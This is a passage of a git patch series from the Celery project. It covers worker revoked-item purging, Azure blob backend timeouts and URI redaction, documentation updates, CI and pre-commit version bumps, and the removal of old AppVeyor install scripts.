@@ -601,7 +601,7 @@ def __init__(self, *tasks, **options):
tasks = (regen(tasks[0]) if len(tasks) == 1 and is_list(tasks[0])
else tasks)
super().__init__('celery.chain', (), {'tasks': tasks}, **options
- )
+ )
self._use_link = options.pop('use_link', None)
self.subtask_type = 'chain'
self._frozen = None
@@ -903,8 +903,8 @@ def from_dict(cls, d, app=None):
def __init__(self, task, it, **options):
super().__init__(self._task_name, (),
- {'task': task, 'it': regen(it)}, immutable=True, **options
- )
+ {'task': task, 'it': regen(it)}, immutable=True, **options
+ )
def apply_async(self, args=None, kwargs=None, **opts):
# need to evaluate generators
@@ -956,9 +956,9 @@ def from_dict(cls, d, app=None):
def __init__(self, task, it, n, **options):
super().__init__('celery.chunks', (),
- {'task': task, 'it': regen(it), 'n': n},
- immutable=True, **options
- )
+ {'task': task, 'it': regen(it), 'n': n},
+ immutable=True, **options
+ )
def __call__(self, **options):
return self.apply_async(**options)
@@ -1054,7 +1054,7 @@ def __init__(self, *tasks, **options):
if not isinstance(tasks, _regen):
tasks = regen(tasks)
super().__init__('celery.group', (), {'tasks': tasks}, **options
- )
+ )
self.subtask_type = 'group'
def __call__(self, *partial_args, **options):
@@ -1350,9 +1350,9 @@ def __init__(self, header, body=None, task='celery.chord',
args = args if args else ()
kwargs = kwargs if kwargs else {'kwargs': {}}
super().__init__(task, args,
- {**kwargs, 'header': _maybe_group(header, app),
- 'body': maybe_signature(body, app=app)}, app=app, **options
- )
+ {**kwargs, 'header': _maybe_group(header, app),
+ 'body': maybe_signature(body, app=app)}, app=app, **options
+ )
self.subtask_type = 'chord'
def __call__(self, body=None, **options):
diff --git a/celery/contrib/rdb.py b/celery/contrib/rdb.py
index 995bec16d19..a34c0b52678 100644
--- a/celery/contrib/rdb.py
+++ b/celery/contrib/rdb.py
@@ -111,7 +111,7 @@ def __init__(self, host=CELERY_RDB_HOST, port=CELERY_RDB_PORT,
self.say(SESSION_STARTED.format(self=self))
self._handle = sys.stdin = sys.stdout = self._client.makefile('rw')
super().__init__(completekey='tab',
- stdin=self._handle, stdout=self._handle)
+ stdin=self._handle, stdout=self._handle)
def get_avail_port(self, host, port, search_limit=100, skew=+0):
try:
diff --git a/celery/utils/serialization.py b/celery/utils/serialization.py
index 673fdf50913..c03a20f9419 100644
--- a/celery/utils/serialization.py
+++ b/celery/utils/serialization.py
@@ -134,7 +134,7 @@ def __init__(self, exc_module, exc_cls_name, exc_args, text=None):
self.exc_args = safe_exc_args
self.text = text
super().__init__(exc_module, exc_cls_name, safe_exc_args,
- text)
+ text)
def restore(self):
return create_exception_cls(self.exc_cls_name,
From b0ecc35bacd64416093b82cea4a9f150595e5b04 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Oliver=20Nem=C4=8Dek?=
Date: Fri, 1 Oct 2021 12:32:24 +0200
Subject: [PATCH 085/177] Prevent worker to send expired revoked items upon
hello command (#6975)
* Prevent worker to send expired revoked items upon hello command.
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
celery/worker/control.py | 2 ++
t/unit/worker/test_control.py | 19 ++++++++++++++++++-
2 files changed, 20 insertions(+), 1 deletion(-)
diff --git a/celery/worker/control.py b/celery/worker/control.py
index 2518948f1b1..197d0c4d617 100644
--- a/celery/worker/control.py
+++ b/celery/worker/control.py
@@ -310,6 +310,8 @@ def hello(state, from_node, revoked=None, **kwargs):
logger.info('sync with %s', from_node)
if revoked:
worker_state.revoked.update(revoked)
+ # Do not send expired items to the other worker.
+ worker_state.revoked.purge()
return {
'revoked': worker_state.revoked._data,
'clock': state.app.clock.forward(),
diff --git a/t/unit/worker/test_control.py b/t/unit/worker/test_control.py
index 8e1e02d64df..0d53d65e3bc 100644
--- a/t/unit/worker/test_control.py
+++ b/t/unit/worker/test_control.py
@@ -1,5 +1,6 @@
import socket
import sys
+import time
from collections import defaultdict
from datetime import datetime, timedelta
from queue import Queue as FastQueue
@@ -16,7 +17,7 @@
from celery.worker import state as worker_state
from celery.worker.pidbox import Pidbox, gPidbox
from celery.worker.request import Request
-from celery.worker.state import revoked
+from celery.worker.state import REVOKE_EXPIRES, revoked
hostname = socket.gethostname()
@@ -192,6 +193,22 @@ def test_hello(self):
finally:
worker_state.revoked.discard('revoked1')
+ def test_hello_does_not_send_expired_revoked_items(self):
+ consumer = Consumer(self.app)
+ panel = self.create_panel(consumer=consumer)
+ panel.state.app.clock.value = 313
+ panel.state.hostname = 'elaine@vandelay.com'
+ # Add an expired revoked item to the revoked set.
+ worker_state.revoked.add(
+ 'expired_in_past',
+ now=time.monotonic() - REVOKE_EXPIRES - 1
+ )
+ x = panel.handle('hello', {
+ 'from_node': 'george@vandelay.com',
+ 'revoked': {'1234', '4567', '891'}
+ })
+ assert 'expired_in_past' not in x['revoked']
+
def test_conf(self):
consumer = Consumer(self.app)
panel = self.create_panel(consumer=consumer)
From cba7d62475ae980c19dbd83ef52529d804e3c9bf Mon Sep 17 00:00:00 2001
From: Pedram Ashofteh Ardakani
Date: Sun, 3 Oct 2021 12:52:25 +0330
Subject: [PATCH 086/177] docs: clarify the 'keeping results' section (#6979)
* docs: clarify the 'keeping results' section
It might seem obvious for experienced users, but new users could get
confused with where to add the 'backend' argument. Should it be passed
as an argument when invoking celery? In a seperate configuration file?
This leads to opening up many tabs and looking for a clue which in
turn, might frustrate a newbie.
So, the manual could simply save a lot of headache with explicitly
stating: you could modify this line in the very first 'tasks.py' file
you are trying to work with!
This commit fixes that.
* docs: keeping results section, reload updated 'app'
A simple '>>> from tasks import app' might not consider the updates we
made in a running session for different versions of python (if it
works at all). So, the new users should be reminded to close and
reopen the session to avoid confusion.
* Update docs/getting-started/first-steps-with-celery.rst
Co-authored-by: Omer Katz
Co-authored-by: Omer Katz
---
docs/getting-started/first-steps-with-celery.rst | 10 ++++++----
1 file changed, 6 insertions(+), 4 deletions(-)
diff --git a/docs/getting-started/first-steps-with-celery.rst b/docs/getting-started/first-steps-with-celery.rst
index 799db7200d7..a87af8f7201 100644
--- a/docs/getting-started/first-steps-with-celery.rst
+++ b/docs/getting-started/first-steps-with-celery.rst
@@ -229,7 +229,8 @@ and -- or you can define your own.
For this example we use the `rpc` result backend, that sends states
back as transient messages. The backend is specified via the ``backend`` argument to
:class:`@Celery`, (or via the :setting:`result_backend` setting if
-you choose to use a configuration module):
+you choose to use a configuration module). So, you can modify this line in the `tasks.py`
+file to enable the `rpc://` backend:
.. code-block:: python
@@ -244,12 +245,13 @@ the message broker (a popular combination):
To read more about result backends please see :ref:`task-result-backends`.
-Now with the result backend configured, let's call the task again.
-This time you'll hold on to the :class:`~@AsyncResult` instance returned
-when you call a task:
+Now with the result backend configured, close the current python session and import the
+``tasks`` module again to put the changes into effect. This time you'll hold on to the
+:class:`~@AsyncResult` instance returned when you call a task:
.. code-block:: pycon
+ >>> from tasks import add # close and reopen to get updated 'app'
>>> result = add.delay(4, 4)
The :meth:`~@AsyncResult.ready` method returns whether the task
From ffb0d3d54884aaae140a20879a58449b27946f49 Mon Sep 17 00:00:00 2001
From: Jens Timmerman
Date: Mon, 4 Oct 2021 17:12:20 +0200
Subject: [PATCH 087/177] Update deprecated task module removal in 5.0
documentation (#6981)
* Update whatsnew-5.0.rst
* update 5.0 deprecation documentation to reflect reality
* Update whatsnew-5.1.rst
* Update whatsnew-5.0.rst
* Update whatsnew-5.1.rst
---
docs/history/whatsnew-5.0.rst | 6 ++++++
docs/internals/deprecation.rst | 13 ++++++++++++-
docs/whatsnew-5.1.rst | 7 +++++++
3 files changed, 25 insertions(+), 1 deletion(-)
diff --git a/docs/history/whatsnew-5.0.rst b/docs/history/whatsnew-5.0.rst
index d2e2df90e62..bb27b59cf32 100644
--- a/docs/history/whatsnew-5.0.rst
+++ b/docs/history/whatsnew-5.0.rst
@@ -262,6 +262,12 @@ you should import `kombu.utils.encoding` instead.
If you were using the `celery.task` module before, you should import directly
from the `celery` module instead.
+If you were using `from celery.task import Task` you should use
+`from celery import Task` instead.
+
+If you were using the `celery.task` decorator you should use
+`celery.shared_task` instead.
+
.. _new_command_line_interface:
New Command Line Interface
diff --git a/docs/internals/deprecation.rst b/docs/internals/deprecation.rst
index 222dd6644d9..23d03ad36f7 100644
--- a/docs/internals/deprecation.rst
+++ b/docs/internals/deprecation.rst
@@ -34,7 +34,7 @@ Compat Task Modules
from celery import task
-- Module ``celery.task`` *may* be removed (not decided)
+- Module ``celery.task`` will be removed
This means you should change:
@@ -44,10 +44,21 @@ Compat Task Modules
into:
+ .. code-block:: python
+
+ from celery import shared_task
+
+ -- and:
.. code-block:: python
from celery import task
+ into:
+
+ .. code-block:: python
+
+ from celery import shared_task
+
-- and:
.. code-block:: python
diff --git a/docs/whatsnew-5.1.rst b/docs/whatsnew-5.1.rst
index bdd35f0773c..a1c7416cdda 100644
--- a/docs/whatsnew-5.1.rst
+++ b/docs/whatsnew-5.1.rst
@@ -290,6 +290,13 @@ you should import `kombu.utils.encoding` instead.
If you were using the `celery.task` module before, you should import directly
from the `celery` module instead.
+If you were using `from celery.task import Task` you should use
+`from celery import Task` instead.
+
+If you were using the `celery.task` decorator you should use
+`celery.shared_task` instead.
+
+
`azure-servicebus` 7.0.0 is now required
----------------------------------------
From 9b713692e18bc257a2433a4a2d594bc928dcaa91 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 4 Oct 2021 16:35:59 +0000
Subject: [PATCH 088/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/pyupgrade: v2.28.0 → v2.29.0](https://github.com/asottile/pyupgrade/compare/v2.28.0...v2.29.0)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 83eaf953100..449a5a88c7b 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/asottile/pyupgrade
- rev: v2.28.0
+ rev: v2.29.0
hooks:
- id: pyupgrade
args: ["--py37-plus"]
From d5380fa02d1ef038b99105dacd9a281f19d74575 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 5 Oct 2021 13:54:43 +0600
Subject: [PATCH 089/177] try python 3.10 GA
---
.github/workflows/python-package.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 4136c4eff62..b4076bf6429 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -24,7 +24,7 @@ jobs:
strategy:
fail-fast: false
matrix:
- python-version: ['3.7', '3.8', '3.9', '3.10.0-rc.2', 'pypy-3.7']
+ python-version: ['3.7', '3.8', '3.9', '3.10', 'pypy-3.7']
os: ["ubuntu-20.04", "windows-2019"]
steps:
From ef545e3d222fd5ac955077aa44801f9b68002e37 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 5 Oct 2021 14:37:06 +0600
Subject: [PATCH 090/177] mention python 3.10 on readme
---
README.rst | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.rst b/README.rst
index a2ae072e6fd..9f9ccaaf47c 100644
--- a/README.rst
+++ b/README.rst
@@ -59,7 +59,7 @@ What do I need?
Celery version 5.2.0rc1 runs on,
-- Python (3.7, 3.8, 3.9)
+- Python (3.7, 3.8, 3.9, 3.10)
- PyPy3.7 (7.3+)
From d3773221fcf38de29b3cbc17abe2deafb90895f0 Mon Sep 17 00:00:00 2001
From: Marat Idrisov
Date: Mon, 4 Oct 2021 22:40:52 +0300
Subject: [PATCH 091/177] Documenting the default consumer_timeout value for
rabbitmq >= 3.8.15
Related to issue #6760
---
docs/userguide/calling.rst | 25 +++++++++++++++++++++++++
1 file changed, 25 insertions(+)
diff --git a/docs/userguide/calling.rst b/docs/userguide/calling.rst
index efeb1bb6c13..8bfe52feef4 100644
--- a/docs/userguide/calling.rst
+++ b/docs/userguide/calling.rst
@@ -252,6 +252,31 @@ and timezone information):
>>> tomorrow = datetime.utcnow() + timedelta(days=1)
>>> add.apply_async((2, 2), eta=tomorrow)
+.. warning::
+
+ When using RabbitMQ as a message broker when specifying a ``countdown``
+ over 15 minutes, you may encounter the problem that the worker terminates
+ with an :exc:`~amqp.exceptions.PreconditionFailed` error will be raised:
+
+ .. code-block:: pycon
+
+ amqp.exceptions.PreconditionFailed: (0, 0): (406) PRECONDITION_FAILED - consumer ack timed out on channel
+
+ In RabbitMQ since version 3.8.15 the default value for
+ ``consumer_timeout`` is 15 minutes.
+ Since version 3.8.17 it was increased to 30 minutes. If a consumer does
+ not ack its delivery for more than the timeout value, its channel will be
+ closed with a ``PRECONDITION_FAILED`` channel exception.
+ See `Delivery Acknowledgement Timeout`_ for more information.
+
+ To solve the problem, in RabbitMQ configuration file ``rabbitmq.conf`` you
+ should specify the ``consumer_timeout`` parameter greater than or equal to
+ your countdown value. For example, you can specify a very large value
+ of ``consumer_timeout = 31622400000``, which is equal to 1 year
+ in milliseconds, to avoid problems in the future.
+
+.. _`Delivery Acknowledgement Timeout`: https://www.rabbitmq.com/consumers.html#acknowledgement-timeout
+
.. _calling-expiration:
Expiration
From 49452916f94d5ec60af246cea600855e6d976b48 Mon Sep 17 00:00:00 2001
From: Tomasz Kluczkowski
Date: Wed, 6 Oct 2021 10:35:56 +0100
Subject: [PATCH 092/177] Azure blockblob backend parametrized connection/read
timeouts (#6978)
* Initial hardcoded (sorry) change to the celery azure block blob backend.
This is required to check if this change has any influence.
If it does I will make it proper config option in celery itself.
* Add sensible defaults for azure block blob backend.
The problem we hit in production is on certain network errors (suspect partitioning) the client becomes stuck on the default read timeout for an ssl socket
which in azure is defined in `/azure/storage/blob/_shared/constants.py` as READ_TIMEOUT = 80000 (seconds) for python versions > 3.5.
This means that for those python versions the operation is stuck for 55.555[...] days until it times out which is obviously not ideal :).
This sets the timeouts at 20s for connection (which is the current default) and 120s for all python versions, which with modern connections is sufficient.
If we think it should be higher - I can increase it but we definitely should give the user an option to set their own timeouts based on file sizes and bandwidths they are operating on.
* Update docs a bit.
* Update docs/userguide/configuration.rst
Co-authored-by: Omer Katz
* Add test confirming azure blob client is configured correctly based on values supplied from configuration dictionary.
Co-authored-by: tomaszkluczkowski
Co-authored-by: Asif Saif Uddin
Co-authored-by: Omer Katz
---
celery/app/defaults.py | 2 ++
celery/backends/azureblockblob.py | 10 ++++++-
docs/userguide/configuration.rst | 18 +++++++++++++
t/unit/backends/test_azureblockblob.py | 36 ++++++++++++++++++++++++++
4 files changed, 65 insertions(+), 1 deletion(-)
diff --git a/celery/app/defaults.py b/celery/app/defaults.py
index 70f4fb8b0ac..596c750f2b5 100644
--- a/celery/app/defaults.py
+++ b/celery/app/defaults.py
@@ -133,6 +133,8 @@ def __repr__(self):
retry_increment_base=Option(2, type='int'),
retry_max_attempts=Option(3, type='int'),
base_path=Option('', type='string'),
+ connection_timeout=Option(20, type='int'),
+ read_timeout=Option(120, type='int'),
),
control=Namespace(
queue_ttl=Option(300.0, type='float'),
diff --git a/celery/backends/azureblockblob.py b/celery/backends/azureblockblob.py
index 972baaf73e9..4b263a5cbff 100644
--- a/celery/backends/azureblockblob.py
+++ b/celery/backends/azureblockblob.py
@@ -44,6 +44,10 @@ def __init__(self,
conf["azureblockblob_container_name"])
self.base_path = conf.get('azureblockblob_base_path', '')
+ self._connection_timeout = conf.get(
+ 'azureblockblob_connection_timeout', 20
+ )
+ self._read_timeout = conf.get('azureblockblob_read_timeout', 120)
@classmethod
def _parse_url(cls, url, prefix="azureblockblob://"):
@@ -61,7 +65,11 @@ def _blob_service_client(self):
the container is created if it doesn't yet exist.
"""
- client = BlobServiceClient.from_connection_string(self._connection_string)
+ client = BlobServiceClient.from_connection_string(
+ self._connection_string,
+ connection_timeout=self._connection_timeout,
+ read_timeout=self._read_timeout
+ )
try:
client.create_container(name=self._container_name)
diff --git a/docs/userguide/configuration.rst b/docs/userguide/configuration.rst
index f78388fd7b7..d2291c3535a 100644
--- a/docs/userguide/configuration.rst
+++ b/docs/userguide/configuration.rst
@@ -1599,6 +1599,24 @@ Default: 3.
The maximum number of retry attempts.
+.. setting:: azureblockblob_connection_timeout
+
+``azureblockblob_connection_timeout``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Default: 20.
+
+Timeout in seconds for establishing the azure block blob connection.
+
+.. setting:: azureblockblob_read_timeout
+
+``azureblockblob_read_timeout``
+~~~~~~~~~~~~~~~~~~~~
+
+Default: 120.
+
+Timeout in seconds for reading of an azure block blob.
+
.. _conf-elasticsearch-result-backend:
Elasticsearch backend settings
diff --git a/t/unit/backends/test_azureblockblob.py b/t/unit/backends/test_azureblockblob.py
index 7c80400cc1e..ec6dac9973d 100644
--- a/t/unit/backends/test_azureblockblob.py
+++ b/t/unit/backends/test_azureblockblob.py
@@ -61,6 +61,42 @@ def test_create_client(self, mock_blob_service_factory):
assert backend._blob_service_client is not None
assert mock_blob_service_client_instance.create_container.call_count == 1
+ @patch(MODULE_TO_MOCK + ".BlobServiceClient")
+ def test_configure_client(self, mock_blob_service_factory):
+
+ connection_timeout = 3
+ read_timeout = 11
+ self.app.conf.update(
+ {
+ 'azureblockblob_connection_timeout': connection_timeout,
+ 'azureblockblob_read_timeout': read_timeout,
+ }
+ )
+
+ mock_blob_service_client_instance = Mock()
+ mock_blob_service_factory.from_connection_string.return_value = (
+ mock_blob_service_client_instance
+ )
+
+ base_url = "azureblockblob://"
+ connection_string = "connection_string"
+ backend = AzureBlockBlobBackend(
+ app=self.app, url=f'{base_url}{connection_string}'
+ )
+
+ client = backend._blob_service_client
+ assert client is mock_blob_service_client_instance
+
+ (
+ mock_blob_service_factory
+ .from_connection_string
+ .assert_called_once_with(
+ connection_string,
+ connection_timeout=connection_timeout,
+ read_timeout=read_timeout
+ )
+ )
+
@patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client")
def test_get(self, mock_client, base_path):
self.backend.base_path = base_path
From fc689bde77415a04740501a9ff097a15e0529f17 Mon Sep 17 00:00:00 2001
From: Tomasz-Kluczkowski
Date: Sat, 9 Oct 2021 15:44:34 +0100
Subject: [PATCH 093/177] Add as_uri method to azure block blob backend.
It is strange that the azure block blob backend shows no URI during celery boot.
This should fix it.
---
celery/backends/azureblockblob.py | 23 +++++++++++++++++++++-
t/unit/backends/test_azureblockblob.py | 27 ++++++++++++++++++++++++++
2 files changed, 49 insertions(+), 1 deletion(-)
diff --git a/celery/backends/azureblockblob.py b/celery/backends/azureblockblob.py
index 4b263a5cbff..e7d2c231808 100644
--- a/celery/backends/azureblockblob.py
+++ b/celery/backends/azureblockblob.py
@@ -18,6 +18,7 @@
__all__ = ("AzureBlockBlobBackend",)
LOGGER = get_logger(__name__)
+AZURE_BLOCK_BLOB_CONNECTION_PREFIX = 'azureblockblob://'
class AzureBlockBlobBackend(KeyValueStoreBackend):
@@ -50,7 +51,7 @@ def __init__(self,
self._read_timeout = conf.get('azureblockblob_read_timeout', 120)
@classmethod
- def _parse_url(cls, url, prefix="azureblockblob://"):
+ def _parse_url(cls, url, prefix=AZURE_BLOCK_BLOB_CONNECTION_PREFIX):
connection_string = url[len(prefix):]
if not connection_string:
raise ImproperlyConfigured("Invalid URL")
@@ -143,3 +144,23 @@ def delete(self, key):
)
blob_client.delete_blob()
+
+ def as_uri(self, include_password=False):
+ if include_password:
+ return (
+ f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}'
+ f'{self._connection_string}'
+ )
+
+ connection_string_parts = self._connection_string.split(';')
+ account_key_prefix = 'AccountKey='
+ redacted_connection_string_parts = [
+ f'{account_key_prefix}**' if part.startswith(account_key_prefix)
+ else part
+ for part in connection_string_parts
+ ]
+
+ return (
+ f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}'
+ f'{";".join(redacted_connection_string_parts)}'
+ )
diff --git a/t/unit/backends/test_azureblockblob.py b/t/unit/backends/test_azureblockblob.py
index ec6dac9973d..5329140627f 100644
--- a/t/unit/backends/test_azureblockblob.py
+++ b/t/unit/backends/test_azureblockblob.py
@@ -165,3 +165,30 @@ def test_base_path_conf_default(self):
url=self.url
)
assert backend.base_path == ''
+
+
+class test_as_uri:
+ def setup(self):
+ self.url = (
+ "azureblockblob://"
+ "DefaultEndpointsProtocol=protocol;"
+ "AccountName=name;"
+ "AccountKey=account_key;"
+ "EndpointSuffix=suffix"
+ )
+ self.backend = AzureBlockBlobBackend(
+ app=self.app,
+ url=self.url
+ )
+
+ def test_as_uri_include_password(self):
+ assert self.backend.as_uri(include_password=True) == self.url
+
+ def test_as_uri_exclude_password(self):
+ assert self.backend.as_uri(include_password=False) == (
+ "azureblockblob://"
+ "DefaultEndpointsProtocol=protocol;"
+ "AccountName=name;"
+ "AccountKey=**;"
+ "EndpointSuffix=suffix"
+ )
From a22dbaeafd2eb195983588cf22ee1a98721a2c28 Mon Sep 17 00:00:00 2001
From: MelnykR
Date: Sun, 10 Oct 2021 12:20:47 +0300
Subject: [PATCH 094/177] Add possibility to override backend implementation
with celeryconfig (#6879)
* Parse override_backend field in Loader config
* cover override_backends feature with tests
* add docs
---
celery/loaders/base.py | 2 ++
docs/userguide/configuration.rst | 22 ++++++++++++++++++++++
t/unit/app/test_loaders.py | 5 ++++-
3 files changed, 28 insertions(+), 1 deletion(-)
diff --git a/celery/loaders/base.py b/celery/loaders/base.py
index ad45bad19e3..8cc15de8f8a 100644
--- a/celery/loaders/base.py
+++ b/celery/loaders/base.py
@@ -126,6 +126,8 @@ def config_from_object(self, obj, silent=False):
return False
raise
self._conf = force_mapping(obj)
+ if self._conf.get('override_backends') is not None:
+ self.override_backends = self._conf['override_backends']
return True
def _smart_import(self, path, imp=None):
diff --git a/docs/userguide/configuration.rst b/docs/userguide/configuration.rst
index d2291c3535a..0d7d7554d0a 100644
--- a/docs/userguide/configuration.rst
+++ b/docs/userguide/configuration.rst
@@ -855,6 +855,28 @@ Default interval for retrying chord tasks.
.. _conf-database-result-backend:
+
+.. setting:: override_backends
+
+``override_backends``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Default: Disabled by default.
+
+Path to class that implements backend.
+
+Allows to override backend implementation.
+This can be useful if you need to store additional metadata about executed tasks,
+override retry policies, etc.
+
+Example:
+
+.. code-block:: python
+
+ override_backends = {"db": "custom_module.backend.class"}
+
+
+
Database backend settings
-------------------------
diff --git a/t/unit/app/test_loaders.py b/t/unit/app/test_loaders.py
index 97becf0e397..9a411e963a4 100644
--- a/t/unit/app/test_loaders.py
+++ b/t/unit/app/test_loaders.py
@@ -69,9 +69,12 @@ def test_init_worker_process(self):
m.assert_called_with()
def test_config_from_object_module(self):
- self.loader.import_from_cwd = Mock()
+ self.loader.import_from_cwd = Mock(return_value={
+ "override_backends": {"db": "custom.backend.module"},
+ })
self.loader.config_from_object('module_name')
self.loader.import_from_cwd.assert_called_with('module_name')
+ assert self.loader.override_backends == {"db": "custom.backend.module"}
def test_conf_property(self):
assert self.loader.conf['foo'] == 'bar'
From 50b0f6bd0784ce2fd160f6b9186de4a0e1b5d4d3 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 11 Oct 2021 16:36:54 +0000
Subject: [PATCH 095/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/PyCQA/flake8: 3.9.2 → 4.0.1](https://github.com/PyCQA/flake8/compare/3.9.2...4.0.1)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 449a5a88c7b..e02add6be46 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -6,7 +6,7 @@ repos:
args: ["--py37-plus"]
- repo: https://github.com/PyCQA/flake8
- rev: 3.9.2
+ rev: 4.0.1
hooks:
- id: flake8
From c735e152d124a52be5d547b6b36d862485d388e5 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Mon, 18 Oct 2021 14:31:26 +0600
Subject: [PATCH 096/177] try to fix deprecation warning
WARNING: PendingDeprecationWarning
Support of old-style PyPy config keys will be removed in tox-gh-actions v3.
Please use "pypy-2" and "pypy-3" instead of "pypy2" and "pypy3".
Example of tox.ini:
[gh-actions]
python =
pypy-2: pypy2
pypy-3: pypy3
# The followings won't work with tox-gh-actions v3
# pypy2: pypy2
# pypy3: pypy3
---
tox.ini | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/tox.ini b/tox.ini
index 64213027b9c..39cfcb5e198 100644
--- a/tox.ini
+++ b/tox.ini
@@ -17,7 +17,7 @@ python =
3.8: 3.8-unit
3.9: 3.9-unit
3.10: 3.10-unit
- pypy3: pypy3-unit
+ pypy-3: pypy3-unit
[testenv]
sitepackages = False
From 89815ca617217dc2c2fb896848ee877aec0bc69e Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 25 Oct 2021 16:35:50 +0000
Subject: [PATCH 097/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/yesqa: v1.2.3 → v1.3.0](https://github.com/asottile/yesqa/compare/v1.2.3...v1.3.0)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index e02add6be46..5897b1fd242 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -11,7 +11,7 @@ repos:
- id: flake8
- repo: https://github.com/asottile/yesqa
- rev: v1.2.3
+ rev: v1.3.0
hooks:
- id: yesqa
From c9a82a3a8cb2eba36ecddc531f27f63d219fb356 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 29 Oct 2021 22:40:05 +0600
Subject: [PATCH 098/177] not needed anyore
---
extra/appveyor/install.ps1 | 85 --------------------------------------
1 file changed, 85 deletions(-)
delete mode 100644 extra/appveyor/install.ps1
diff --git a/extra/appveyor/install.ps1 b/extra/appveyor/install.ps1
deleted file mode 100644
index 7166f65e37a..00000000000
--- a/extra/appveyor/install.ps1
+++ /dev/null
@@ -1,85 +0,0 @@
-# Sample script to install Python and pip under Windows
-# Authors: Olivier Grisel and Kyle Kastner
-# License: CC0 1.0 Universal: https://creativecommons.org/publicdomain/zero/1.0/
-
-$BASE_URL = "https://www.python.org/ftp/python/"
-$GET_PIP_URL = "https://bootstrap.pypa.io/get-pip.py"
-$GET_PIP_PATH = "C:\get-pip.py"
-
-
-function DownloadPython ($python_version, $platform_suffix) {
- $webclient = New-Object System.Net.WebClient
- $filename = "python-" + $python_version + $platform_suffix + ".msi"
- $url = $BASE_URL + $python_version + "/" + $filename
-
- $basedir = $pwd.Path + "\"
- $filepath = $basedir + $filename
- if (Test-Path $filename) {
- Write-Host "Reusing" $filepath
- return $filepath
- }
-
- # Download and retry up to 5 times in case of network transient errors.
- Write-Host "Downloading" $filename "from" $url
- $retry_attempts = 3
- for($i=0; $i -lt $retry_attempts; $i++){
- try {
- $webclient.DownloadFile($url, $filepath)
- break
- }
- Catch [Exception]{
- Start-Sleep 1
- }
- }
- Write-Host "File saved at" $filepath
- return $filepath
-}
-
-
-function InstallPython ($python_version, $architecture, $python_home) {
- Write-Host "Installing Python" $python_version "for" $architecture "bit architecture to" $python_home
- if (Test-Path $python_home) {
- Write-Host $python_home "already exists, skipping."
- return $false
- }
- if ($architecture -eq "32") {
- $platform_suffix = ""
- } else {
- $platform_suffix = ".amd64"
- }
- $filepath = DownloadPython $python_version $platform_suffix
- Write-Host "Installing" $filepath "to" $python_home
- $args = "/qn /i $filepath TARGETDIR=$python_home"
- Write-Host "msiexec.exe" $args
- Start-Process -FilePath "msiexec.exe" -ArgumentList $args -Wait -Passthru
- Write-Host "Python $python_version ($architecture) installation complete"
- return $true
-}
-
-
-function InstallPip ($python_home) {
- $pip_path = $python_home + "/Scripts/pip.exe"
- $python_path = $python_home + "/python.exe"
- if (-not(Test-Path $pip_path)) {
- Write-Host "Installing pip..."
- $webclient = New-Object System.Net.WebClient
- $webclient.DownloadFile($GET_PIP_URL, $GET_PIP_PATH)
- Write-Host "Executing:" $python_path $GET_PIP_PATH
- Start-Process -FilePath "$python_path" -ArgumentList "$GET_PIP_PATH" -Wait -Passthru
- } else {
- Write-Host "pip already installed."
- }
-}
-
-function InstallPackage ($python_home, $pkg) {
- $pip_path = $python_home + "/Scripts/pip.exe"
- & $pip_path install $pkg
-}
-
-function main () {
- InstallPython $env:PYTHON_VERSION $env:PYTHON_ARCH $env:PYTHON
- InstallPip $env:PYTHON
- InstallPackage $env:PYTHON wheel
-}
-
-main
From 7b18240c76500e94c78325b6b2deb4469937b307 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 29 Oct 2021 22:40:29 +0600
Subject: [PATCH 099/177] not needed anyore
---
extra/appveyor/run_with_compiler.cmd | 47 ----------------------------
1 file changed, 47 deletions(-)
delete mode 100644 extra/appveyor/run_with_compiler.cmd
